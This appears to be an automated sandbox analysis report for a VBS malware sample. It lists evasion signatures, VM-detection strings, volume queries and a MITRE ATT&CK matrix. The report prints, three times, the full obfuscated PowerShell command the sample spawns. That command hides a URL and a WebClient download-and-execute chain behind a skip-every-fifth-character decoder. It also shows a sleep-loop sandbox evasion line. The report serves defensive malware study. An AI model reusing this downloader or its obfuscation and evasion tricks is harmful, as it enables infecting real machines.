      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Potential evasive VBS script found (sleep loop)
      Source: Initial fileInitial file: Do Until (Now() > Suspensorium) Wscript.Sleep 100
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7069Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2820Jump to behavior
      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2454Jump to behavior
      Source: C:\Windows\System32\wscript.exe TID: 1508Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5068Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.983940773.0000021DA824D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: wscript.exe, 00000000.00000002.985177593.0000021DA822E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.^
      Source: wscript.exe, 00000000.00000003.885438886.0000021DA822F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983172434.0000021DA822D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.985177593.0000021DA822E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.884550858.0000021DA8230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2174647837.0000025CEFC59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2172309222.0000025CEA62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2174594466.0000025CEFC40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_4020.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4020, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $russule; function tvangsmiddels($backgeared){$submerge=4;do {$ima+=$backgeared[$submerge];$pjat=format-list;$submerge+=5} until(!$backgeared[$submerge])$ima}function ankomsterne($dolors20){ .($indeficiency) ($dolors20)}$ergoterapeutskoler=tvangsmiddels 'int,nhypeemetetobel.nykaw';$ergoterapeutskoler+=tvangsmiddels ',ngeecliebern ctriclhalvicen,ehom nforst';$postethmoid=tvangsmiddels 'sivamtogfodemize trivarslbulllflaca da /';$recuperator=tvangsmiddels ' sint a.ol mi.svo d1vi k2';$destalinises136=' nov[pussnbuksemisttgevi. wils veeskylrsvanvan oi semc diseaftepbetio stoiwestn t,ltklynm lacahydrneft ael ag b de disrsupp]henv:gunh: smascor e lrec acoustewrbargiflu tpupiyfu fp ympritenosulptoffeofinac,alaohaanlj,me=send$ tyfrsgekemythc stouembep eskepolir ,arau matbestok,olr';$postethmoid+=tvangsmiddels 'jnan5 phr.cham0cel, ph,n(assiwin.eihe enco ndriddo nonwco gspsyc abronfodetneut pse1ddni0genn. shi0 und; ana squiwanstiw,rbninte6 tin4pers; hys antexspej6 lus4kirk;farb u,fjrgeo.vmacr:efte1b ot3no.i4 s,u. egu0 nvr)term ma.glatiesvalcindsk udmoamts/repr2g rn0kern1 niv0dels0n bo1.rug0re d1tomo slibfud.eiaabnru.reeramsf sigoref xudv /fode1fryg3 dem4derv.retr0';$pseudocosta=tvangsmiddels 'cannuud.rsprace semrguar-bu ia hargopb,ephilnhotet';$butter=tvangsmiddels ' rsthlamitbrent ,orpsubesanth:amat/i.gm/nordaaudig selh sinam gryd skehelmzbogkamaoiygnide metaounctchee. i ditrffroilc/ intkb.haipr,cd vedsbrom/ cattwienyvek.rkanvot.adsafgiidukknm kseomnis sub.pu.hlengazmellh';$misfortuner=tvangsmiddels 'sag,>';$indeficiency=tvangsmiddels 'sa gi eade p,rx';$semidefiniteness139='vaabenmrkerne';$fiskerflaaden='\hikes.ove';ankomsterne (tvangsmiddels ' va$attegsubslhumao agtbheksahandltelt: stan whieudrupesc ea ranbrodd emmif gesavis=evol$slutest rnsangvdavi: alia snnpund.pnotrdwhydaa pht devarepa+beu $kibyf oaigibbs lbrkge meb,ggr posfhalsltandapostaexo.dr vrebilln');ankomsterne (tvangsmiddels 'lige$sed,gbe tl,resosounbtrumaforllopb :vermkodondclinf ceruo krlangsdobcl= svl$indubsog uantit athtwiree mesrprof. evos undpb scllegeisjlltin u( i f$ haamkompi l,dspropfbillouranr brat tilucrisnk.oaeomslrskid)');ankomsterne (tvangsmiddels $destalinises136);$butter=$kdfuld[0];$keyseat=(tvangsmiddels ' lim$ quig,orsl,ubbounivbcensaoverltjen:pi.kimodfnpl sfp nto ,ksrfrinmkum atr.nt.abbixy ioparangomesdeglipo indodedoldnstopaak imtbulbstils=sucrn,alseumu w tyd-delsoint,b.undjinhaekir cin etreso p.as t,yyaspasblint.amie unpmbou .chef$bl,reskanrh stgmedsoantitrespe vearfaktaaltrpverceformufrittagris re knontoga.llpulpesyndr');ankomsterne ($keyseat);ankomsterne (tvangsmiddels 'slvp$kn kirushnpennfchicomajbrrdtjm coma ovetcatairelaovertninddschloitak n ta.dportsseisapastt fidshost.bagshshore vfdabur.dn rremirarmuresfarl[purp$anopp tegssimieknuruflomdshi opraeceinsot rts dkkt etraobse] odi=acti$bolspfondophi spriztlimiebutttbackh khambomroou biudkrd');$
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $russule; function tvangsmiddels($backgeared){$submerge=4;do {$ima+=$backgeared[$submerge];$pjat=format-list;$submerge+=5} until(!$backgeared[$submerge])$ima}function ankomsterne($dolors20){ .($indeficiency) ($dolors20)}$ergoterapeutskoler=tvangsmiddels 'int,nhypeemetetobel.nykaw';$ergoterapeutskoler+=tvangsmiddels ',ngeecliebern ctriclhalvicen,ehom nforst';$postethmoid=tvangsmiddels 'sivamtogfodemize trivarslbulllflaca da /';$recuperator=tvangsmiddels ' sint a.ol mi.svo d1vi k2';$destalinises136=' nov[pussnbuksemisttgevi. wils veeskylrsvanvan oi semc diseaftepbetio stoiwestn t,ltklynm lacahydrneft ael ag b de disrsupp]henv:gunh: smascor e lrec acoustewrbargiflu tpupiyfu fp ympritenosulptoffeofinac,alaohaanlj,me=send$ tyfrsgekemythc stouembep eskepolir ,arau matbestok,olr';$postethmoid+=tvangsmiddels 'jnan5 phr.cham0cel, ph,n(assiwin.eihe enco ndriddo nonwco gspsyc abronfodetneut pse1ddni0genn. shi0 und; ana squiwanstiw,rbninte6 tin4pers; hys antexspej6 lus4kirk;farb u,fjrgeo.vmacr:efte1b ot3no.i4 s,u. egu0 nvr)term ma.glatiesvalcindsk udmoamts/repr2g rn0kern1 niv0dels0n bo1.rug0re d1tomo slibfud.eiaabnru.reeramsf sigoref xudv /fode1fryg3 dem4derv.retr0';$pseudocosta=tvangsmiddels 'cannuud.rsprace semrguar-bu ia hargopb,ephilnhotet';$butter=tvangsmiddels ' rsthlamitbrent ,orpsubesanth:amat/i.gm/nordaaudig selh sinam gryd skehelmzbogkamaoiygnide metaounctchee. i ditrffroilc/ intkb.haipr,cd vedsbrom/ cattwienyvek.rkanvot.adsafgiidukknm kseomnis sub.pu.hlengazmellh';$misfortuner=tvangsmiddels 'sag,>';$indeficiency=tvangsmiddels 'sa gi eade p,rx';$semidefiniteness139='vaabenmrkerne';$fiskerflaaden='\hikes.ove';ankomsterne (tvangsmiddels ' va$attegsubslhumao agtbheksahandltelt: stan whieudrupesc ea ranbrodd emmif gesavis=evol$slutest rnsangvdavi: alia snnpund.pnotrdwhydaa pht devarepa+beu $kibyf oaigibbs lbrkge meb,ggr posfhalsltandapostaexo.dr vrebilln');ankomsterne (tvangsmiddels 'lige$sed,gbe tl,resosounbtrumaforllopb :vermkodondclinf ceruo krlangsdobcl= svl$indubsog uantit athtwiree mesrprof. evos undpb scllegeisjlltin u( i f$ haamkompi l,dspropfbillouranr brat tilucrisnk.oaeomslrskid)');ankomsterne (tvangsmiddels $destalinises136);$butter=$kdfuld[0];$keyseat=(tvangsmiddels ' lim$ quig,orsl,ubbounivbcensaoverltjen:pi.kimodfnpl sfp nto ,ksrfrinmkum atr.nt.abbixy ioparangomesdeglipo indodedoldnstopaak imtbulbstils=sucrn,alseumu w tyd-delsoint,b.undjinhaekir cin etreso p.as t,yyaspasblint.amie unpmbou .chef$bl,reskanrh stgmedsoantitrespe vearfaktaaltrpverceformufrittagris re knontoga.llpulpesyndr');ankomsterne ($keyseat);ankomsterne (tvangsmiddels 'slvp$kn kirushnpennfchicomajbrrdtjm coma ovetcatairelaovertninddschloitak n ta.dportsseisapastt fidshost.bagshshore vfdabur.dn rremirarmuresfarl[purp$anopp tegssimieknuruflomdshi opraeceinsot rts dkkt etraobse] odi=acti$bolspfondophi spriztlimiebutttbackh khambomroou biudkrd');$Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information321
      Scripting      		Valid Accounts1
      Windows Management Instrumentation      		321
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Application Layer Protocol      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook2
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.